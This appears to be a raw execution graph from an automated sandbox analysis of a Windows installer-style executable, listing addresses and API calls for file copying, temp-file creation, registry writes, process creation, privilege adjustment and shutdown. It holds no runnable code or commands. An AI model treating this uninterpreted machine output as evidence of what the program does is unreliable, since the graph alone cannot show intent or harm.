                                                                                                                                                                                    execution_graph 4772 10001000 4775 1000101b 4772->4775 4782 100014bb 4775->4782 4777 10001020 4778 10001024 4777->4778 4779 10001027 GlobalAlloc 4777->4779 4780 100014e2 3 API calls 4778->4780 4779->4778 4781 10001019 4780->4781 4784 100014c1 4782->4784 4783 100014c7 4783->4777 4784->4783 4785 100014d3 GlobalFree 4784->4785 4785->4777 3753 4025c4 3754 402a9f 17 API calls 3753->3754 3755 4025ce 3754->3755 3757 40263e 3755->3757 3759 40264e 3755->3759 3761 40263c 3755->3761 3762 405b76 ReadFile 3755->3762 3764 405ec3 wsprintfA 3757->3764 3760 402664 SetFilePointer 3759->3760 3759->3761 3760->3761 3763 405b94 3762->3763 3763->3755 3764->3761 3793 402245 3794 402ac1 17 API calls 3793->3794 3795 40224b 3794->3795 3796 402ac1 17 API calls 3795->3796 3797 402254 3796->3797 3798 402ac1 17 API calls 3797->3798 3799 40225d 3798->3799 3808 406268 FindFirstFileA 3799->3808 3802 402277 lstrlenA lstrlenA 3804 40508c 24 API calls 3802->3804 3805 4022b3 SHFileOperationA 3804->3805 3806 40226a 3805->3806 3807 402272 3805->3807 3811 40508c 3806->3811 3809 402266 3808->3809 3810 40627e FindClose 3808->3810 3809->3802 3809->3806 3810->3809 3812 4050a7 3811->3812 3821 40514a 3811->3821 3813 4050c4 lstrlenA 3812->3813 3814 405f87 17 API calls 3812->3814 3815 4050d2 lstrlenA 3813->3815 3816 4050ed 3813->3816 3814->3813 3817 4050e4 lstrcatA 3815->3817 3815->3821 3818 405100 3816->3818 3819 4050f3 SetWindowTextA 3816->3819 3817->3816 3820 405106 SendMessageA SendMessageA SendMessageA 3818->3820 3818->3821 3819->3818 3820->3821 3821->3807 4786 4028c5 4787 402a9f 17 API calls 4786->4787 4788 4028cb 4787->4788 4789 402900 4788->4789 4791 402716 4788->4791 4792 4028dd 4788->4792 4790 405f87 17 API calls 4789->4790 4789->4791 4790->4791 4792->4791 4794 405ec3 wsprintfA 4792->4794 4794->4791 3830 401746 3831 402ac1 17 API calls 3830->3831 3832 40174d 3831->3832 3836 405b2d 3832->3836 3834 401754 3835 405b2d 2 API calls 3834->3835 3835->3834 3837 405b38 GetTickCount GetTempFileNameA 3836->3837 3838 405b69 3837->3838 3839 405b65 3837->3839 3838->3834 3839->3837 3839->3838 4795 4022c7 4796 4022ce 4795->4796 4800 4022e1 4795->4800 4797 405f87 17 API calls 4796->4797 4798 4022db 4797->4798 4799 405681 MessageBoxIndirectA 4798->4799 4799->4800 4801 401947 4802 402ac1 17 API calls 4801->4802 4803 40194e lstrlenA 4802->4803 4804 402577 4803->4804 3840 10002709 3841 10002759 3840->3841 3842 10002719 VirtualProtect 3840->3842 3842->3841 3843 4051ca 3844 405375 3843->3844 3845 4051ec GetDlgItem GetDlgItem GetDlgItem 3843->3845 3847 4053a5 3844->3847 3848 40537d GetDlgItem CreateThread CloseHandle 3844->3848 3889 40405b SendMessageA 3845->3889 3850 4053d3 3847->3850 3852 4053f4 3847->3852 3853 4053bb ShowWindow ShowWindow 3847->3853 3848->3847 3912 40515e OleInitialize 3848->3912 3849 40525c 3857 405263 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3849->3857 3851 4053db 3850->3851 3858 40542e 3850->3858 3854 4053e3 3851->3854 3855 405407 ShowWindow 3851->3855 3898 40408d 3852->3898 3894 40405b SendMessageA 3853->3894 3895 403fff 3854->3895 3862 405427 3855->3862 3863 405419 3855->3863 3864 4052d1 3857->3864 3865 4052b5 SendMessageA SendMessageA 3857->3865 3858->3852 3866 40543b SendMessageA 3858->3866 3861 405400 3868 403fff SendMessageA 3862->3868 3867 40508c 24 API calls 3863->3867 3869 4052e4 3864->3869 3870 4052d6 SendMessageA 3864->3870 3865->3864 3866->3861 3871 405454 CreatePopupMenu 3866->3871 3867->3862 3868->3858 3890 404026 3869->3890 3870->3869 3873 405f87 17 API calls 3871->3873 3874 405464 AppendMenuA 3873->3874 3876 405482 GetWindowRect 3874->3876 3877 405495 TrackPopupMenu 3874->3877 3875 4052f4 3878 405331 GetDlgItem SendMessageA 3875->3878 3879 4052fd ShowWindow 3875->3879 3876->3877 3877->3861 3880 4054b1 3877->3880 3878->3861 3882 405358 SendMessageA SendMessageA 3878->3882 3881 405313 ShowWindow 3879->3881 3884 405320 3879->3884 3883 4054d0 SendMessageA 3880->3883 3881->3884 3882->3861 3883->3883 3885 4054ed OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3883->3885 3893 40405b SendMessageA 3884->3893 3887 40550f SendMessageA 3885->3887 3887->3887 3888 405531 GlobalUnlock SetClipboardData CloseClipboard 3887->3888 3888->3861 3889->3849 3891 405f87 17 API calls 3890->3891 3892 404031 SetDlgItemTextA 3891->3892 3892->3875 3893->3878 3894->3850 3896 404006 3895->3896 3897 40400c SendMessageA 3895->3897 3896->3897 3897->3852 3899 4040a5 GetWindowLongA 3898->3899 3909 40412e 3898->3909 3900 4040b6 3899->3900 3899->3909 3901 4040c5 GetSysColor 3900->3901 3902 4040c8 3900->3902 3901->3902 3903 4040d8 SetBkMode 3902->3903 3904 4040ce SetTextColor 3902->3904 3905 4040f0 GetSysColor 3903->3905 3906 4040f6 3903->3906 3904->3903 3905->3906 3907 404107 3906->3907 3908 4040fd SetBkColor 3906->3908 3907->3909 3910 404121 CreateBrushIndirect 3907->3910 3911 40411a DeleteObject 3907->3911 3908->3907 3909->3861 3910->3909 3911->3910 3919 404072 3912->3919 3914 405181 3918 4051a8 3914->3918 3922 401389 3914->3922 3915 404072 SendMessageA 3916 4051ba OleUninitialize 3915->3916 3918->3915 3920 40408a 3919->3920 3921 40407b SendMessageA 3919->3921 3920->3914 3921->3920 3924 401390 3922->3924 3923 4013fe 3923->3914 3924->3923 3925 4013cb MulDiv SendMessageA 3924->3925 3925->3924 4808 4020cb 4809 402ac1 17 API calls 4808->4809 4810 4020d2 4809->4810 4811 402ac1 17 API calls 4810->4811 4812 4020dc 4811->4812 4813 402ac1 17 API calls 4812->4813 4814 4020e6 4813->4814 4815 402ac1 17 API calls 4814->4815 4816 4020f0 4815->4816 4817 402ac1 17 API calls 4816->4817 4818 4020fa 4817->4818 4819 40213c CoCreateInstance 4818->4819 4820 402ac1 17 API calls 4818->4820 4823 40215b 4819->4823 4825 402206 4819->4825 4820->4819 4821 401423 24 API calls 4822 40223c 4821->4822 4824 4021e6 MultiByteToWideChar 4823->4824 4823->4825 4824->4825 4825->4821 4825->4822 4826 1000180d 4827 10001830 4826->4827 4828 10001860 GlobalFree 4827->4828 4829 10001872 4827->4829 4828->4829 4830 10001266 2 API calls 4829->4830 4831 100019e3 GlobalFree GlobalFree 4830->4831 4832 4026ce 4833 4026d4 4832->4833 4834 4026d8 FindNextFileA 4833->4834 4836 4026ea 4833->4836 4835 402729 4834->4835 4834->4836 4838 405f65 lstrcpynA 4835->4838 4838->4836 4839 40444f 4840 404485 4839->4840 4841 40445f 4839->4841 4843 40408d 8 API calls 4840->4843 4842 404026 18 API calls 4841->4842 4844 40446c SetDlgItemTextA 4842->4844 4845 404491 4843->4845 4844->4840 4846 4023d0 4847 402ac1 17 API calls 4846->4847 4848 4023e2 4847->4848 4849 402ac1 17 API calls 4848->4849 4850 4023ec 4849->4850 4863 402b51 4850->4863 4853 402716 4854 402421 4856 40242d 4854->4856 4858 402a9f 17 API calls 4854->4858 4855 402ac1 17 API calls 4857 40241a lstrlenA 4855->4857 4859 40244c RegSetValueExA 4856->4859 4860 402f81 31 API calls 4856->4860 4857->4854 4858->4856 4861 402462 RegCloseKey 4859->4861 4860->4859 4861->4853 4864 402b6c 4863->4864 4867 405e19 4864->4867 4868 405e28 4867->4868 4869 405e33 RegCreateKeyExA 4868->4869 4870 4023fc 4868->4870 4869->4870 4870->4853 4870->4854 4870->4855 4397 403b52 4398 403ca5 4397->4398 4399 403b6a 4397->4399 4401 403cb6 GetDlgItem GetDlgItem 4398->4401 4410 403cf6 4398->4410 4399->4398 4400 403b76 4399->4400 4402 403b81 SetWindowPos 4400->4402 4403 403b94 4400->4403 4404 404026 18 API calls 4401->4404 4402->4403 4407 403bb1 4403->4407 4408 403b99 ShowWindow 4403->4408 4409 403ce0 SetClassLongA 4404->4409 4405 403d50 4406 404072 SendMessageA 4405->4406 4415 403ca0 4405->4415 4438 403d62 4406->4438 4411 403bd3 4407->4411 4412 403bb9 DestroyWindow 4407->4412 4408->4407 4413 40140b 2 API calls 4409->4413 4410->4405 4414 401389 2 API calls 4410->4414 4417 403bd8 SetWindowLongA 4411->4417 4418 403be9 4411->4418 4416 403faf 4412->4416 4413->4410 4419 403d28 4414->4419 4416->4415 4426 403fe0 ShowWindow 4416->4426 4417->4415 4422 403c92 4418->4422 4423 403bf5 GetDlgItem 4418->4423 4419->4405 4424 403d2c SendMessageA 4419->4424 4420 40140b 2 API calls 4420->4438 4421 403fb1 DestroyWindow EndDialog 4421->4416 4425 40408d 8 API calls 4422->4425 4427 403c25 4423->4427 4428 403c08 SendMessageA IsWindowEnabled 4423->4428 4424->4415 4425->4415 4426->4415 4430 403c32 4427->4430 4431 403c79 SendMessageA 4427->4431 4432 403c45 4427->4432 4441 403c2a 4427->4441 4428->4415 4428->4427 4429 405f87 17 API calls 4429->4438 4430->4431 4430->4441 4431->4422 4435 403c62 4432->4435 4436 403c4d 4432->4436 4433 403fff SendMessageA 4437 403c60 4433->4437 4434 404026 18 API calls 4434->4438 4440 40140b 2 API calls 4435->4440 4439 40140b 2 API calls 4436->4439 4437->4422 4438->4415 4438->4420 4438->4421 4438->4429 4438->4434 4443 404026 18 API calls 4438->4443 4459 403ef1 DestroyWindow 4438->4459 4439->4441 4442 403c69 4440->4442 4441->4433 4442->4422 4442->4441 4444 403ddd GetDlgItem 4443->4444 4445 403df2 4444->4445 4446 403dfa ShowWindow KiUserCallbackDispatcher 4444->4446 4445->4446 4468 404048 KiUserCallbackDispatcher 4446->4468 4448 403e24 EnableWindow 4453 403e38 4448->4453 4449 403e3d GetSystemMenu EnableMenuItem SendMessageA 4450 403e6d SendMessageA 4449->4450 4449->4453 4450->4453 4452 403b33 18 API calls 4452->4453 4453->4449 4453->4452 4469 40405b SendMessageA 4453->4469 4470 405f65 lstrcpynA 4453->4470 4455 403e9c lstrlenA 4456 405f87 17 API calls 4455->4456 4457 403ead SetWindowTextA 4456->4457 4458 401389 2 API calls 4457->4458 4458->4438 4459->4416 4460 403f0b CreateDialogParamA 4459->4460 4460->4416 4461 403f3e 4460->4461 4462 404026 18 API calls 4461->4462 4463 403f49 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4462->4463 4464 401389 2 API calls 4463->4464 4465 403f8f 4464->4465 4465->4415 4466 403f97 ShowWindow 4465->4466 4467 404072 SendMessageA 4466->4467 4467->4416 4468->4448 4469->4453 4470->4455 4871 401cd4 4872 402a9f 17 API calls 4871->4872 4873 401cda IsWindow 4872->4873 4874 401a0e 4873->4874 4875 4014d6 4876 402a9f 17 API calls 4875->4876 4877 4014dc Sleep 4876->4877 4879 402951 4877->4879 4487 401759 4488 402ac1 17 API calls 4487->4488 4489 401760 4488->4489 4490 401786 4489->4490 4491 40177e 4489->4491 4528 405f65 lstrcpynA 4490->4528 4527 405f65 lstrcpynA 4491->4527 4494 401784 4498 4061cf 5 API calls 4494->4498 4495 401791 4496 4058fd 3 API calls 4495->4496 4497 401797 lstrcatA 4496->4497 4497->4494 4523 4017a3 4498->4523 4499 4017e4 4501 405ad9 2 API calls 4499->4501 4500 406268 2 API calls 4500->4523 4501->4523 4503 4017ba CompareFileTime 4503->4523 4504 40187e 4506 40508c 24 API calls 4504->4506 4505 401855 4507 40508c 24 API calls 4505->4507 4525 40186a 4505->4525 4508 401888 4506->4508 4507->4525 4509 402f81 31 API calls 4508->4509 4510 40189b 4509->4510 4512 4018af SetFileTime 4510->4512 4513 4018c1 CloseHandle 4510->4513 4511 405f65 lstrcpynA 4511->4523 4512->4513 4515 4018d2 4513->4515 4513->4525 4514 405f87 17 API calls 4514->4523 4516 4018d7 4515->4516 4517 4018ea 4515->4517 4518 405f87 17 API calls 4516->4518 4519 405f87 17 API calls 4517->4519 4521 4018df lstrcatA 4518->4521 4522 4018f2 4519->4522 4520 405681 MessageBoxIndirectA 4520->4523 4521->4522 4524 405681 MessageBoxIndirectA 4522->4524 4523->4499 4523->4500 4523->4503 4523->4504 4523->4505 4523->4511 4523->4514 4523->4520 4526 405afe GetFileAttributesA CreateFileA 4523->4526 4524->4525 4526->4523 4527->4494 4528->4495 4880 401659 4881 402ac1 17 API calls 4880->4881 4882 40165f 4881->4882 4883 406268 2 API calls 4882->4883 4884 401665 4883->4884 4885 401959 4886 402a9f 17 API calls 4885->4886 4887 401960 4886->4887 4888 402a9f 17 API calls 4887->4888 4889 40196d 4888->4889 4890 402ac1 17 API calls 4889->4890 4891 401984 lstrlenA 4890->4891 4892 401994 4891->4892 4893 4019d4 4892->4893 4897 405f65 lstrcpynA 4892->4897 4895 4019c4 4895->4893 4896 4019c9 lstrlenA 4895->4896 4896->4893 4897->4895 4898 1000161a 4899 10001649 4898->4899 4900 10001a5d 18 API calls 4899->4900 4901 10001650 4900->4901 4902 10001663 4901->4902 4903 10001657 4901->4903 4905 1000168a 4902->4905 4906 1000166d 4902->4906 4904 10001266 2 API calls 4903->4904 4910 10001661 4904->4910 4908 10001690 4905->4908 4909 100016b4 4905->4909 4907 100014e2 3 API calls 4906->4907 4911 10001672 4907->4911 4912 10001559 3 API calls 4908->4912 4913 100014e2 3 API calls 4909->4913 4914 10001559 3 API calls 4911->4914 4915 10001695 4912->4915 4913->4910 4916 10001678 4914->4916 4917 10001266 2 API calls 4915->4917 4918 10001266 2 API calls 4916->4918 4919 1000169b GlobalFree 4917->4919 4920 1000167e GlobalFree 4918->4920 4919->4910 4921 100016af GlobalFree 4919->4921 4920->4910 4921->4910 4922 401f5b 4923 402ac1 17 API calls 4922->4923 4924 401f62 4923->4924 4925 4062fd 5 API calls 4924->4925 4926 401f71 4925->4926 4927 401ff1 4926->4927 4928 401f89 GlobalAlloc 4926->4928 4928->4927 4929 401f9d 4928->4929 4930 4062fd 5 API calls 4929->4930 4931 401fa4 4930->4931 4932 4062fd 5 API calls 4931->4932 4933 401fae 4932->4933 4933->4927 4937 405ec3 wsprintfA 4933->4937 4935 401fe5 4938 405ec3 wsprintfA 4935->4938 4937->4935 4938->4927 4939 40255b 4940 402ac1 17 API calls 4939->4940 4941 402562 4940->4941 4944 405afe GetFileAttributesA CreateFileA 4941->4944 4943 40256e 4944->4943 4945 401a5e 4946 402a9f 17 API calls 4945->4946 4947 401a64 4946->4947 4948 402a9f 17 API calls 4947->4948 4949 401a0e 4948->4949 4760 4024df 4761 402b01 17 API calls 4760->4761 4762 4024e9 4761->4762 4763 402a9f 17 API calls 4762->4763 4764 4024f2 4763->4764 4765 402500 4764->4765 4770 402716 4764->4770 4766 402519 RegEnumValueA 4765->4766 4767 40250d RegEnumKeyA 4765->4767 4768 402535 RegCloseKey 4766->4768 4769 40252e 4766->4769 4767->4768 4768->4770 4769->4768 4950 402c61 4951 402c70 SetTimer 4950->4951 4952 402c89 4950->4952 4951->4952 4953 402cde 4952->4953 4954 402ca3 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4952->4954 4954->4953 4955 401563 4956 4028f9 4955->4956 4959 405ec3 wsprintfA 4956->4959 4958 4028fe 4959->4958 4960 4047e7 4961 404813 4960->4961 4962 4047f7 4960->4962 4964 404846 4961->4964 4965 404819 SHGetPathFromIDListA 4961->4965 4971 405665 GetDlgItemTextA 4962->4971 4967 404830 SendMessageA 4965->4967 4968 404829 4965->4968 4966 404804 SendMessageA 4966->4961 4967->4964 4969 40140b 2 API calls 4968->4969 4969->4967 4971->4966 4972 40166a 4973 402ac1 17 API calls 4972->4973 4974 401671 4973->4974 4975 402ac1 17 API calls 4974->4975 4976 40167a 4975->4976 4977 402ac1 17 API calls 4976->4977 4978 401683 MoveFileA 4977->4978 4979 401696 4978->4979 4980 40168f 4978->4980 4982 406268 2 API calls 4979->4982 4984 40223c 4979->4984 4981 401423 24 API calls 4980->4981 4981->4984 4983 4016a5 4982->4983 4983->4984 4985 405d44 36 API calls 4983->4985 4985->4980 3926 40246d 3937 402b01 3926->3937 3929 402ac1 17 API calls 3930 402480 3929->3930 3931 40248a RegQueryValueExA 3930->3931 3932 402716 3930->3932 3933 4024b0 RegCloseKey 3931->3933 3934 4024aa 3931->3934 3933->3932 3934->3933 3942 405ec3 wsprintfA 3934->3942 3938 402ac1 17 API calls 3937->3938 3939 402b18 3938->3939 3940 405deb RegOpenKeyExA 3939->3940 3941 402477 3940->3941 3941->3929 3942->3933 4986 4019ed 4987 402ac1 17 API calls 4986->4987 4988 4019f4 4987->4988 4989 402ac1 17 API calls 4988->4989 4990 4019fd 4989->4990 4991 401a04 lstrcmpiA 4990->4991 4992 401a16 lstrcmpA 4990->4992 4993 401a0a 4991->4993 4992->4993 3943 40416f 3944 404185 3943->3944 3949 404291 3943->3949 3947 404026 18 API calls 3944->3947 3945 404300 3948 40430a GetDlgItem 3945->3948 3951 4043ca 3945->3951 3950 4041db 3947->3950 3952 404320 3948->3952 3953 404388 3948->3953 3949->3945 3949->3951 3954 4042d5 GetDlgItem SendMessageA 3949->3954 3955 404026 18 API calls 3950->3955 3956 40408d 8 API calls 3951->3956 3952->3953 3961 404346 SendMessageA LoadCursorA SetCursor 3952->3961 3953->3951 3957 40439a 3953->3957 3980 404048 KiUserCallbackDispatcher 3954->3980 3959 4041e8 CheckDlgButton 3955->3959 3960 4043c5 3956->3960 3962 4043a0 SendMessageA 3957->3962 3963 4043b1 3957->3963 3978 404048 KiUserCallbackDispatcher 3959->3978 3975 404413 3961->3975 3962->3963 3963->3960 3967 4043b7 SendMessageA 3963->3967 3964 4042fb 3981 4043ef 3964->3981 3967->3960 3969 404206 GetDlgItem 3979 40405b SendMessageA 3969->3979 3972 40421c SendMessageA 3973 404243 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3972->3973 3974 40423a GetSysColor 3972->3974 3973->3960 3974->3973 3984 405647 ShellExecuteExA 3975->3984 3977 404379 LoadCursorA SetCursor 3977->3953 3978->3969 3979->3972 3980->3964 3982 404402 SendMessageA 3981->3982 3983 4043fd 3981->3983 3982->3945 3983->3982 3984->3977 4994 40156f 4995 401586 4994->4995 4996 40157f ShowWindow 4994->4996 4997 402951 4995->4997 4998 401594 ShowWindow 4995->4998 4996->4995 4998->4997 3985 4031f1 SetErrorMode GetVersion 3986 403232 3985->3986 3987 403238 3985->3987 3988 4062fd 5 API calls 3986->3988 4076 40628f GetSystemDirectoryA 3987->4076 3988->3987 3990 40324e lstrlenA 3990->3987 3991 40325d 3990->3991 4079 4062fd GetModuleHandleA 3991->4079 3994 4062fd 5 API calls 3995 40326b 3994->3995 3996 4062fd 5 API calls 3995->3996 3997 403277 #17 OleInitialize SHGetFileInfoA 3996->3997 4085 405f65 lstrcpynA 3997->4085 4000 4032c3 GetCommandLineA 4086 405f65 lstrcpynA 4000->4086 4002 4032d5 GetModuleHandleA 4003 4032ec 4002->4003 4004 405928 CharNextA 4003->4004 4005 403300 CharNextA 4004->4005 4013 403310 4005->4013 4006 4033da 4007 4033ed GetTempPathA 4006->4007 4087 4031c0 4007->4087 4009 403405 4010 403409 GetWindowsDirectoryA lstrcatA 4009->4010 4011 40345f DeleteFileA 4009->4011 4014 4031c0 12 API calls 4010->4014 4097 402d48 GetTickCount GetModuleFileNameA 4011->4097 4012 405928 CharNextA 4012->4013 4013->4006 4013->4012 4017 4033dc 4013->4017 4016 403425 4014->4016 4016->4011 4019 403429 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4016->4019 4192 405f65 lstrcpynA 4017->4192 4018 403473 4026 405928 CharNextA 4018->4026 4058 4034f9 4018->4058 4071 403509 4018->4071 4021 4031c0 12 API calls 4019->4021 4024 403457 4021->4024 4024->4011 4024->4071 4038 40348e 4026->4038 4027 403641 4030 4036c3 ExitProcess 4027->4030 4031 403649 GetCurrentProcess OpenProcessToken 4027->4031 4028 403523 4216 405681 4028->4216 4036 403694 4031->4036 4037 403664 LookupPrivilegeValueA AdjustTokenPrivileges 4031->4037 4034 4034d4 4193 4059eb 4034->4193 4035 403539 4181 4055ec 4035->4181 4041 4062fd 5 API calls 4036->4041 4037->4036 4038->4034 4038->4035 4044 40369b 4041->4044 4047 4036b0 ExitWindowsEx 4044->4047 4050 4036bc 4044->4050 4045 40355a lstrcatA lstrcmpiA 4049 403576 4045->4049 4045->4071 4046 40354f lstrcatA 4046->4045 4047->4030 4047->4050 4053 403582 4049->4053 4054 40357b 4049->4054 4229 40140b 4050->4229 4052 4034ee 4208 405f65 lstrcpynA 4052->4208 4225 4055cf CreateDirectoryA 4053->4225 4220 405552 CreateDirectoryA 4054->4220 4125 4037b5 4058->4125 4060 403587 SetCurrentDirectoryA 4061 4035a1 4060->4061 4062 403596 4060->4062 4184 405f65 lstrcpynA 4061->4184 4228 405f65 lstrcpynA 4062->4228 4065 405f87 17 API calls 4066 4035e0 DeleteFileA 4065->4066 4067 4035ed CopyFileA 4066->4067 4073 4035af 4066->4073 4067->4073 4068 403635 4069 405d44 36 API calls 4068->4069 4069->4071 4209 4036db 4071->4209 4072 405f87 17 API calls 4072->4073 4073->4065 4073->4068 4073->4072 4075 403621 CloseHandle 4073->4075 4185 405d44 MoveFileExA 4073->4185 4189 405604 CreateProcessA 4073->4189 4075->4073 4077 4062b1 wsprintfA LoadLibraryExA 4076->4077 4077->3990 4080 406323 GetProcAddress 4079->4080 4081 406319 4079->4081 4084 403264 4080->4084 4082 40628f 3 API calls 4081->4082 4083 40631f 4082->4083 4083->4080 4083->4084 4084->3994 4085->4000 4086->4002 4088 4061cf 5 API calls 4087->4088 4089 4031cc 4088->4089 4090 4031d6 4089->4090 4232 4058fd lstrlenA CharPrevA 4089->4232 4090->4009 4093 4055cf 2 API calls 4094 4031e4 4093->4094 4095 405b2d 2 API calls 4094->4095 4096 4031ef 4095->4096 4096->4009 4235 405afe GetFileAttributesA CreateFileA 4097->4235 4099 402d88 4117 402d98 4099->4117 4236 405f65 lstrcpynA 4099->4236 4101 402dae 4237 405944 lstrlenA 4101->4237 4105 402dbf GetFileSize 4106 402ebb 4105->4106 4119 402dd6 4105->4119 4242 402ce4 4106->4242 4108 402ec4 4110 402ef4 GlobalAlloc 4108->4110 4108->4117 4277 4031a9 SetFilePointer 4108->4277 4253 4031a9 SetFilePointer 4110->4253 4112 402f27 4116 402ce4 6 API calls 4112->4116 4114 402edd 4118 403193 ReadFile 4114->4118 4115 402f0f 4254 402f81 4115->4254 4116->4117 4117->4018 4121 402ee8 4118->4121 4119->4106 4119->4112 4119->4117 4122 402ce4 6 API calls 4119->4122 4274 403193 4119->4274 4121->4110 4121->4117 4122->4119 4123 402f1b 4123->4117 4123->4123 4124 402f58 SetFilePointer 4123->4124 4124->4117 4126 4062fd 5 API calls 4125->4126 4127 4037c9 4126->4127 4128 4037e1 4127->4128 4129 4037cf 4127->4129 4130 405e4c 3 API calls 4128->4130 4293 405ec3 wsprintfA 4129->4293 4131 40380c 4130->4131 4133 40382a lstrcatA 4131->4133 4135 405e4c 3 API calls 4131->4135 4134 4037df 4133->4134 4285 403a7a 4134->4285 4135->4133 4138 4059eb 18 API calls 4139 40385c 4138->4139 4140 4038e5 4139->4140 4142 405e4c 3 API calls 4139->4142 4141 4059eb 18 API calls 4140->4141 4143 4038eb 4141->4143 4144 403888 4142->4144 4145 4038fb LoadImageA 4143->4145 4146 405f87 17 API calls 4143->4146 4144->4140 4149 4038a4 lstrlenA 4144->4149 4153 405928 CharNextA 4144->4153 4147 4039a1 4145->4147 4148 403922 RegisterClassA 4145->4148 4146->4145 4152 40140b 2 API calls 4147->4152 4150 4039ab 4148->4150 4151 403958 SystemParametersInfoA CreateWindowExA 4148->4151 4154 4038b2 lstrcmpiA 4149->4154 4155 4038d8 4149->4155 4150->4071 4151->4147 4156 4039a7 4152->4156 4158 4038a2 4153->4158 4154->4155 4159 4038c2 GetFileAttributesA 4154->4159 4157 4058fd 3 API calls 4155->4157 4156->4150 4160 403a7a 18 API calls 4156->4160 4161 4038de 4157->4161 4158->4149 4162 4038ce 4159->4162 4163 4039b8 4160->4163 4294 405f65 lstrcpynA 4161->4294 4162->4155 4165 405944 2 API calls 4162->4165 4166 4039c4 ShowWindow 4163->4166 4167 403a47 4163->4167 4165->4155 4169 40628f 3 API calls 4166->4169 4168 40515e 5 API calls 4167->4168 4170 403a4d 4168->4170 4172 4039dc 4169->4172 4171 403a69 4170->4171 4174 403a51 4170->4174 4175 40140b 2 API calls 4171->4175 4173 4039ea GetClassInfoA 4172->4173 4176 40628f 3 API calls 4172->4176 4177 403a14 DialogBoxParamA 4173->4177 4178 4039fe GetClassInfoA RegisterClassA 4173->4178 4174->4150 4179 40140b 2 API calls 4174->4179 4175->4150 4176->4173 4180 40140b 2 API calls 4177->4180 4178->4177 4179->4150 4180->4150 4182 4062fd 5 API calls 4181->4182 4183 40353e lstrcatA 4182->4183 4183->4045 4183->4046 4184->4073 4186 405d65 4185->4186 4187 405d58 4185->4187 4186->4073 4299 405bd4 4187->4299 4190 405643 4189->4190 4191 405637 CloseHandle 4189->4191 4190->4073 4191->4190 4192->4007 4333 405f65 lstrcpynA 4193->4333 4195 4059fc 4334 405996 CharNextA CharNextA 4195->4334 4198 4034df 4198->4071 4207 405f65 lstrcpynA 4198->4207 4199 4061cf 5 API calls 4205 405a12 4199->4205 4200 405a3d lstrlenA 4201 405a48 4200->4201 4200->4205 4203 4058fd 3 API calls 4201->4203 4202 406268 2 API calls 4202->4205 4204 405a4d GetFileAttributesA 4203->4204 4204->4198 4205->4198 4205->4200 4205->4202 4206 405944 2 API calls 4205->4206 4206->4200 4207->4052 4208->4058 4210 4036f3 4209->4210 4211 4036e5 CloseHandle 4209->4211 4340 403720 4210->4340 4211->4210 4217 405696 4216->4217 4218 4056aa MessageBoxIndirectA 4217->4218 4219 403531 ExitProcess 4217->4219 4218->4219 4221 4055a3 GetLastError 4220->4221 4222 403580 4220->4222 4221->4222 4223 4055b2 SetFileSecurityA 4221->4223 4222->4060 4223->4222 4224 4055c8 GetLastError 4223->4224 4224->4222 4226 4055e3 GetLastError 4225->4226 4227 4055df 4225->4227 4226->4227 4227->4060 4228->4061 4230 401389 2 API calls 4229->4230 4231 401420 4230->4231 4231->4030 4233 4031de 4232->4233 4234 405917 lstrcatA 4232->4234 4233->4093 4234->4233 4235->4099 4236->4101 4238 405951 4237->4238 4239 402db4 4238->4239 4240 405956 CharPrevA 4238->4240 4241 405f65 lstrcpynA 4239->4241 4240->4238 4240->4239 4241->4105 4243 402d05 4242->4243 4244 402ced 4242->4244 4247 402d15 GetTickCount 4243->4247 4248 402d0d 4243->4248 4245 402cf6 DestroyWindow 4244->4245 4246 402cfd 4244->4246 4245->4246 4246->4108 4250 402d23 CreateDialogParamA ShowWindow 4247->4250 4251 402d46 4247->4251 4278 406339 4248->4278 4250->4251 4251->4108 4253->4115 4256 402f97 4254->4256 4255 402fc5 4258 403193 ReadFile 4255->4258 4256->4255 4284 4031a9 SetFilePointer 4256->4284 4259 402fd0 4258->4259 4260 402fe2 GetTickCount 4259->4260 4261 40312c 4259->4261 4263 403116 4259->4263 4260->4263 4270 403031 4260->4270 4262 40316e 4261->4262 4267 403130 4261->4267 4265 403193 ReadFile 4262->4265 4263->4123 4264 403193 ReadFile 4264->4270 4265->4263 4266 403193 ReadFile 4266->4267 4267->4263 4267->4266 4268 405ba5 WriteFile 4267->4268 4268->4267 4269 403087 GetTickCount 4269->4270 4270->4263 4270->4264 4270->4269 4271 4030ac MulDiv wsprintfA 4270->4271 4282 405ba5 WriteFile 4270->4282 4272 40508c 24 API calls 4271->4272 4272->4270 4275 405b76 ReadFile 4274->4275 4276 4031a6 4275->4276 4276->4119 4277->4114 4279 406356 PeekMessageA 4278->4279 4280 402d13 4279->4280 4281 40634c DispatchMessageA 4279->4281 4280->4108 4281->4279 4283 405bc3 4282->4283 4283->4270 4284->4255 4286 403a8e 4285->4286 4295 405ec3 wsprintfA 4286->4295 4288 403aff 4296 403b33 4288->4296 4290 40383a 4290->4138 4291 403b04 4291->4290 4292 405f87 17 API calls 4291->4292 4292->4291 4293->4134 4294->4140 4295->4288 4297 405f87 17 API calls 4296->4297 4298 403b41 SetWindowTextA 4297->4298 4298->4291 4300 405c20 GetShortPathNameA 4299->4300 4301 405bfa 4299->4301 4302 405c35 4300->4302 4303 405d3f 4300->4303 4326 405afe GetFileAttributesA CreateFileA 4301->4326 4302->4303 4306 405c3d wsprintfA 4302->4306 4303->4186 4305 405c04 CloseHandle GetShortPathNameA 4305->4303 4307 405c18 4305->4307 4308 405f87 17 API calls 4306->4308 4307->4300 4307->4303 4309 405c65 4308->4309 4327 405afe GetFileAttributesA CreateFileA 4309->4327 4311 405c72 4311->4303 4312 405c81 GetFileSize GlobalAlloc 4311->4312 4313 405ca3 4312->4313 4314 405d38 CloseHandle 4312->4314 4315 405b76 ReadFile 4313->4315 4314->4303 4316 405cab 4315->4316 4316->4314 4328 405a63 lstrlenA 4316->4328 4319 405cc2 lstrcpyA 4322 405ce4 4319->4322 4320 405cd6 4321 405a63 4 API calls 4320->4321 4321->4322 4323 405d1b SetFilePointer 4322->4323 4324 405ba5 WriteFile 4323->4324 4325 405d31 GlobalFree 4324->4325 4325->4314 4326->4305 4327->4311 4329 405aa4 lstrlenA 4328->4329 4330 405aac 4329->4330 4331 405a7d lstrcmpiA 4329->4331 4330->4319 4330->4320 4331->4330 4332 405a9b CharNextA 4331->4332 4332->4329 4333->4195 4335 4059b1 4334->4335 4337 4059c1 